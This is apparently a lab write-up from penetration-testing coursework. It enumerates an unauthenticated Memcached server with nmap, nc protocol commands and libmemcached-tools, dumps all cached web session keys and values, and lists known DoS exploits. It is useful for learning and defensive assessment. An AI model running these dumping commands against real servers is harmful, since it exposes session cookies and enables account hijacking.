Memcached

Nmap discovered a Memcached service on the target port 11211 The running service is Memcached 1.4.33 (uptime 403 seconds)

Memcached is a general-purpose distributed memory-caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. Memcached is free and open-source software, licensed under the Revised BSD license. Memcached runs on Unix-like operating systems (Linux and macOS) and on Microsoft Windows. It depends on the libevent library.

By default, Memcached allows unauthorized access, meaning no credentials are required to access it. However, this exposes Memcached servers to potential attacks.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ nmap -p11211 --script=memcached-info $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 11:33 CET
Nmap scan report for 192.168.219.59
Host is up (0.027s latency).
 
PORT      STATE SERVICE
11211/tcp open  memcache
| memcached-info: 
|   Process ID: 536
|   Uptime: 2709 seconds
|   Server time: 2025-03-05T10:33:37
|   Architecture: 64 bit
|   Used CPU (user): 4.040000
|   Used CPU (system): 9.384000
|   Current connections: 1
|   Total connections: 228248
|   Maximum connections: 1024
|   TCP Port: 11211
|   UDP Port: 0
|_  Authentication: no
 
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Performing an additional Nmap scan reveals some info

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
STAT pid 536
STAT uptime 2610
STAT time 1741170718
STAT version 1.4.33
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 4.032000
STAT rusage_system 9.372000
STAT curr_connections 2
STAT total_connections 228246
STAT connection_structures 16
STAT reserved_fds 20
STAT cmd_get 13
STAT cmd_set 228236
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 13
STAT get_misses 0
STAT get_expired 0
STAT get_flushed 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 21683217
STAT bytes_written 1831471
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 18
STAT hash_bytes 2097152
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT log_worker_dropped 0
STAT log_worker_written 0
STAT log_watcher_skipped 0
STAT log_watcher_sent 0
STAT bytes 31038328
STAT curr_items 228223
STAT total_items 228236
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END

The above information shows the current traffic statistics. It serves the number of connections, data is stored into the cache, cache hit ratios and detailed information on the memory usage and distribution of information through the slab allocation used to store individual items.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats slabs" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
STAT 3:chunk_size 152
STAT 3:chunks_per_page 6898
STAT 3:total_pages 34
STAT 3:total_chunks 234532
STAT 3:used_chunks 228223
STAT 3:free_chunks 6309
STAT 3:free_chunks_end 0
STAT 3:mem_requested 31038328
STAT 3:get_hits 11
STAT 3:cmd_set 228234
STAT 3:delete_hits 0
STAT 3:incr_hits 0
STAT 3:decr_hits 0
STAT 3:cas_hits 0
STAT 3:cas_badval 0
STAT 3:touch_hits 0
STAT 4:chunk_size 192
STAT 4:chunks_per_page 5461
STAT 4:total_pages 1
STAT 4:total_chunks 5461
STAT 4:used_chunks 0
STAT 4:free_chunks 5461
STAT 4:free_chunks_end 0
STAT 4:mem_requested 0
STAT 4:get_hits 2
STAT 4:cmd_set 2
STAT 4:delete_hits 0
STAT 4:incr_hits 0
STAT 4:decr_hits 0
STAT 4:cas_hits 0
STAT 4:cas_badval 0
STAT 4:touch_hits 0
STAT active_slabs 2
STAT total_malloced 36697376
END

There are 2 slabs present in the server

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats items" | nc -nv $IP 11211    
(UNKNOWN) [192.168.219.59] 11211 (?) open
STAT items:3:number 228223
STAT items:3:age 2335
STAT items:3:evicted 0
STAT items:3:evicted_nonzero 0
STAT items:3:evicted_time 0
STAT items:3:outofmemory 0
STAT items:3:tailrepairs 0
STAT items:3:reclaimed 0
STAT items:3:expired_unfetched 0
STAT items:3:evicted_unfetched 0
STAT items:3:crawler_reclaimed 0
STAT items:3:crawler_items_checked 0
STAT items:3:lrutail_reflocked 0
END

The above image gives us an insight into how the data is organized in slab ID 3.

Key

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats cachedump 3 0" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
ITEM session:ca25c61f-1c88-4cdd-8817-f6ed2c5ccd3d [26 b; 1743848886 s]
ITEM session:b7ac1548-fae2-477e-8097-47cb33fe5a5b [26 b; 1743848886 s]
ITEM session:01f90bfe-64a2-4963-919f-cc51af923b0d [26 b; 1743848886 s]
ITEM session:d43e30af-f22a-4181-b116-9168da3f978c [26 b; 1743848886 s]
 
[...REDACTED...]
 
ITEM session:27577767-89c1-4cfa-b724-2a33e0b40997 [26 b; 1743848846 s]
ITEM session:4db7e490-4321-49b6-88ed-e74beba14002 [26 b; 1743848846 s]
ITEM session:052675bc-0b37-4f41-ae1e-a4f12c8a0ce5 [26 b; 1743848846 s]
ITEM session:8d3ed56b-9912-4ef5-a76a-6ba549b3333c [26 b; 1743848846 s]
ITEM session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4 [26 b; 1743848846 s]
END

Dumping all the keys present in the slab ID 3 shows a long list of items. Interestingly, they appear to be session cookies used by web applications on the ports 80 and 5000

ITEM <item_key> [<item_size> b; <expiration_timestamp> s]

It uses the following format.

Value

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "get session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
VALUE session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4 0 26
(dp0
V_permanent
p1
I01
s.
END

Reading one of the keys revealed the value stored in it

libmemcached-tools

This can be done better using the libmemcached-tools toolset

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ memcstat --servers=$IP   
Server: 192.168.219.59 (11211)
	pid: 536
	uptime: 3328
	time: 1741171436
	version: 1.4.33
	libevent: 2.0.21-stable
	pointer_size: 64
	rusage_user: 4.116000
	rusage_system: 9.404000
	curr_connections: 1
	total_connections: 228258
	connection_structures: 16
	reserved_fds: 20
	cmd_get: 13
	cmd_set: 228236
	cmd_flush: 0
	cmd_touch: 0
	get_hits: 13
	get_misses: 0
	get_expired: 0
	get_flushed: 0
	delete_misses: 0
	delete_hits: 0
	incr_misses: 0
	incr_hits: 0
	decr_misses: 0
	decr_hits: 0
	cas_misses: 0
	cas_hits: 0
	cas_badval: 0
	touch_hits: 0
	touch_misses: 0
	auth_cmds: 0
	auth_errors: 0
	bytes_read: 21683446
	bytes_written: 10229074
	limit_maxbytes: 67108864
	accepting_conns: 1
	listen_disabled_num: 0
	time_in_listen_disabled_us: 0
	threads: 4
	conn_yields: 0
	hash_power_level: 18
	hash_bytes: 2097152
	hash_is_expanding: 0
	malloc_fails: 0
	log_worker_dropped: 0
	log_worker_written: 0
	log_watcher_skipped: 0
	log_watcher_sent: 0
	bytes: 31038328
	curr_items: 228223
	total_items: 228236
	expired_unfetched: 0
	evicted_unfetched: 0
	evictions: 0
	reclaimed: 0
	crawler_reclaimed: 0
	crawler_items_checked: 0
	lrutail_reflocked: 0

Checking the stats

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ memcdump --servers=$IP -f memcdump.txt

Dumping all the keys into the memcdump.txt file

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ cat memcdump.txt | while read line ; do memccat --servers=$IP $line; done > valuedump.txt

Since memccat doesn’t supports reading file, a simple while loop will do the job

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ cat valuedump.txt 
(dp0
V_permanent
p1
I01
s.
(dp0
V_permanent
p1
I01
s.
(dp0
V_permanent
p1
I01
s.
(dp0
V_permanent
p1
I01
s.
 
[...REDACTED...]

They all contain the same values

Vulnerabilities

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ searchsploit "memcached 1.4.33"
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
Memcached 1.4.33 - 'Add' (PoC)                          | linux/dos/40696.py
Memcached 1.4.33 - 'Crash' (PoC)                        | linux/dos/40695.py
Memcached 1.4.33 - 'sasl' (PoC)                         | linux/dos/40697.py
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Checking the target instance for vulnerabilities reveals 3 exploits N/A

InfoSec LAB

Explorer

Shifty_Memcached_11211

Memcached

Key

Value

libmemcached-tools

Vulnerabilities

Interactive Graph View

Table of Contents

Backlinks